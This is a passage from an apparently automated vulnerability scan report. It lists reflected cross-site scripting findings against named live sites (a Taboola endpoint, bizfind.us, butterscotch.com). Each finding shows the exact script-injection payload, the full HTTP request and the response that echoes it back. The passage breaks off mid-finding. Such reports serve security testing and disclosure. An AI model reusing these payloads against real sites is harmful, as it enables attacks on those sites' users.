Path:   /dispatch/

Issue detail

The value of the item-type request parameter is copied into the HTML document as plain text between tags. The payload 93a54<script>alert(1)</script>e2384cd3dfb was submitted in the item-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video93a54<script>alert(1)</script>e2384cd3dfb&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb
Date: Thu, 03 Feb 2011 21:45:01 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=b3bd9e1a-f928-4358-bae5-e232f65ed404;Path=/;Expires=Fri, 03-Feb-12 21:45:01 GMT
Set-Cookie: taboola_session_id_veoh=v1_ffd326beb15e99ba266c923fcd06736e_b3bd9e1a-f928-4358-bae5-e232f65ed404_1296769501_1296769501;Path=/
Set-Cookie: JSESSIONID=.prod2-f1;Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 4183

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54&lt;script&g
...[SNIP]...
<pre>java.lang.IllegalArgumentException: No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb
   at java.lang.Enum.valueOf(Enum.java:196)
   at com.taboola.model.general.RecommendableItem$ItemType.valueOf(RecommendableItem.java:69)
   at com.taboola.trc.data.TextRelatedContentDataSource.getItemType(
...[SNIP]...

1.79. http://trc.taboolasyndication.com/dispatch/ [list-id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the list-id request parameter is copied into the HTML document as plain text between tags. The payload 5b0f1<script>alert(1)</script>7876a2b5e3a was submitted in the list-id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads)
Date: Thu, 03 Feb 2011 21:44:34 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=6b3a89d9-b958-41dd-9e3d-cae259e7686f;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT
Set-Cookie: taboola_session_id_veoh=v1_ef0ffcfd24d42f1d8f2b50542c8bf625_6b3a89d9-b958-41dd-9e3d-cae259e7686f_1296769474_1296769474;Path=/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4111

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 unsupported request id: rbox-blended5b0f1&lt;script&gt;alert(1)&lt;/script&gt;7876a2b5e3a, for
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads)
   at com.taboola.trc.vhf.viewsHandler.GeneralViewsProducer.handleViewRequest(GeneralViewsProducer.java:336)
   at com.taboola.trc.vhf.viewsHandler.
...[SNIP]...

1.80. http://trc.taboolasyndication.com/dispatch/ [publisher parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the publisher request parameter is copied into the HTML document as plain text between tags. The payload 3cb6d<script>alert(1)</script>b0331f67d92 was submitted in the publisher parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh3cb6d<script>alert(1)</script>b0331f67d92&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92
Date: Thu, 03 Feb 2011 21:44:27 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Connection: close
Content-Length: 3330

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 Invalid publisher name in recommendation request: veoh3cb6d&lt;script&gt;alert(1)&lt;/script&gt
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.dispatchPrehandling(RecommendationClientAdaptor.java:746)
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.httpClientRequest(Reco
...[SNIP]...

1.81. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bfe"><script>alert(1)</script>18ca5e0718d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?97bfe"><script>alert(1)</script>18ca5e0718d=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 15800
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=FDMOGJOBLPHILKAOOAOJGEGF; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/Index.asp?97bfe"><script>alert(1)</script>18ca5e0718d=1" rel="nofollow">
...[SNIP]...

1.82. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ef9"><script>alert(1)</script>dd38641bfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22?d9ef9"><script>alert(1)</script>dd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11704
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=JDEEKNBBLGAHBJGBEKACDHHM; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22&d9ef9"><script>alert(1)</script>dd38641bfde=1" rel="nofollow">
...[SNIP]...

1.83. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The value of REST URL parameter 6 is copied into the name of an HTML tag attribute. The payload 3c056%20a%3dbd8be886654d was submitted in the REST URL parameter 6. This input was echoed as 3c056 a=bd8be886654d in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns3c056%20a%3dbd8be886654d=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12113
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=IOMOGJOBLGKMEEODHDPJNBFA; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS3C056A=BD8BE886654D="ALER
...[SNIP]...
<area shape="rect" rel="nofollow" alt="italian" href="javascript:crealink('http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22/"ns3c056 a=bd8be886654d="alert(0x0006C1)')" coords="0,0,22,15">
...[SNIP]...

1.84. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fc8"><script>alert(1)</script>3c5d1bbb05c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?21fc8"><script>alert(1)</script>3c5d1bbb05c=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12152
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=CCMOGJOBOEJLBIDGEPLHOCKP; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...
<a href="http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22/"ns="alert(0x0006C1)&21fc8"><script>alert(1)</script>3c5d1bbb05c=1" rel="nofollow">
...[SNIP]...

1.85. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload 55cfe><a>a5947f68df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?55cfe><a>a5947f68df6=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11931
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=DNLOGJOBDBDLOPJCCANBACKG; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...
k('traduction.asp?lang=en&amp;dir=http%3A%2F%2Fwww.bizfind.us%2Fschedaazienda.asp%3Fidregione%3D15|isid%3D182221|ragionesociale%3Dabc-development-inc|idcomune1%3Dchicago%2Fx22%2F"ns%3D"alert(0x0006C1)|55cfe><a>a5947f68df6%3D1')" coords="72,0,95,15">
...[SNIP]...

1.86. http://www.butterscotch.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f74ff'><script>alert(1)</script>d34a3b78cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f74ff'><script>alert(1)</script>d34a3b78cab=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b960dd1072a2f3a840f705ff54740c17; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: b960dd1072a2f3a840f705ff54740c17=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/?f74ff'><script>alert(1)</script>d34a3b78cab=1' />
...[SNIP]...

1.87. http://www.butterscotch.com/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 231c0'><script>alert(1)</script>53794fb9664 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=tcv3video231c0'><script>alert(1)</script>53794fb9664 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f0045cb2a5d7807aff4f74328f19c8e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f0045cb2a5d7807aff4f74328f19c8e=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/?src=tcv3video231c0'><script>alert(1)</script>53794fb9664' />
...[SNIP]...

1.88. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c40"><script>alert(1)</script>23d9018f7a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=5e0345a822ab339bca2c7c84855acc0c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 5e0345a822ab339bca2c7c84855acc0c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50395

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3" />
...[SNIP]...

1.89. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f0c8"-alert(1)-"39e9638a1ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/A-List7f0c8"-alert(1)-"39e9638a1ff HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=8826b85f90e6e25f1b2bd4d9bfec5172; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 8826b85f90e6e25f1b2bd4d9bfec5172=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50348

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/A-List7f0c8"-alert(1)-"39e9638a1ff";

</script>
...[SNIP]...

1.90. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0b4'><script>alert(1)</script>f96c8436d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1bdc60d8c9f8abf938a1f22889b51782; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1bdc60d8c9f8abf938a1f22889b51782=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c' />
...[SNIP]...

1.91. http://www.butterscotch.com/shows/AT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be04'><script>alert(1)</script>43f8c6292e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

